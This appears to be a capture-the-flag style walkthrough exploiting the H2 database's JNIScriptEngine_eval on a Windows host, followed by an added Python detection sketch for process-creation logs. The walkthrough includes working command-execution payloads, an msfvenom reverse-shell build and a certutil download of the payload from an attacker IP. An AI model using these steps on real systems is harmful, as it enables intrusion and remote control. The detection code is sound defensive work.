4 H2 JNIScriptEngine exploit > tony
# run shell
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c C:\\Users\\Tony\\Documents\\kashz.exe").getInputStream()).useDelimiter("\\Z").next()');
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("systeminfo").getInputStream()).useDelimiter("\\Z").next()');
Host Name: JACKO
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.18363 N/A Build 18363
Registered Owner: tony
System Type: x64-based PC
Hotfix(s): 9 Hotfix(s) Installed.
# shell
# use port that is open
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.105 LPORT=8082 -f exe -o kashz.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: kashz.exe
# download shell
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil.exe -urlcache -f http://192.168.49.105/kashz.exe C:\\Users\\Tony\\Documents\\kashz.exe").getInputStream()).useDelimiter("\\Z").next()');
# call shell
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c C:\\Users\\Tony\\Documents\\kashz.exe").getInputStream()).useDelimiter("\\Z").next()');
# can't find powershell or anything
echo %path%
C:\Users\tony\AppData\Local\Microsoft\WindowsApps
# update %PATH%
# cmd
set PATH=%PATH%;C:\Windows\System32\;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\wbem\;
# powershell
$env:Path += ";C:\Windows\System32\;C:\Windows\System32\WindowsPowerShell\v1.0\"
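# detection (added example, not part of the original notes)
The chain above (H2's JVM running `systeminfo`, `certutil -urlcache`, then `cmd.exe /c` on an exe in `Documents`) shows up in process-creation logs; this sketch flags it over constructed sample events. Assumptions: field names follow Sysmon Event ID 1, the `java.exe` path and the rule names are made up for illustration.

```python
import ntpath
import re

# Constructed process-creation events (Sysmon Event ID 1 style). The java.exe
# path is an assumption; command lines mirror the ones in the notes above.
JAVA = r"C:\Program Files\Java\bin\java.exe"
SYS32 = "C:\\Windows\\System32\\"
SAMPLE_EVENTS = [
    {"ParentImage": JAVA, "Image": SYS32 + "systeminfo.exe", "CommandLine": "systeminfo"},
    {"ParentImage": JAVA, "Image": SYS32 + "certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -f http://192.168.49.105/kashz.exe "
                    r"C:\Users\Tony\Documents\kashz.exe"},
    {"ParentImage": JAVA, "Image": SYS32 + "cmd.exe",
     "CommandLine": r"cmd.exe /c C:\Users\Tony\Documents\kashz.exe"},
    {"ParentImage": SYS32 + "cmd.exe", "Image": SYS32 + "certutil.exe",
     "CommandLine": r"certutil.exe -hashfile C:\temp\a.zip SHA256"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": SYS32 + "notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

JAVA_PARENTS = {"java.exe", "javaw.exe"}
SUSPECT_CHILDREN = {"cmd.exe", "powershell.exe", "certutil.exe", "systeminfo.exe"}
USER_DIR_EXE = re.compile(
    r"\\users\\[^\\]+\\(?:documents|downloads|desktop|appdata)\\\S*\.exe", re.I)

def classify(event):
    """Return the names of the rules this event trips (empty list if none)."""
    parent = ntpath.basename(event["ParentImage"]).lower()
    image = ntpath.basename(event["Image"]).lower()
    cmd = event["CommandLine"]
    hits = []
    # A JVM (here: the H2 server) starting a shell or system utility.
    if parent in JAVA_PARENTS and image in SUSPECT_CHILDREN:
        hits.append("java_spawned_system_tool")
    # certutil used as a downloader: -urlcache together with a URL.
    if image == "certutil.exe" and re.search(r"[-/]urlcache\b", cmd, re.I) \
            and re.search(r"https?://", cmd, re.I):
        hits.append("certutil_url_download")
    # An executable referenced under a user-writable profile directory.
    if USER_DIR_EXE.search(cmd):
        hits.append("exe_in_user_dir")
    return hits

def scan(events):
    """Return (index, rules) for every event that trips at least one rule."""
    return [(i, r) for i, e in enumerate(events) if (r := classify(e))]

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"], "->", ", ".join(rules))
```

The `certutil -hashfile` and `notepad.exe` events are included as benign controls and trip no rule.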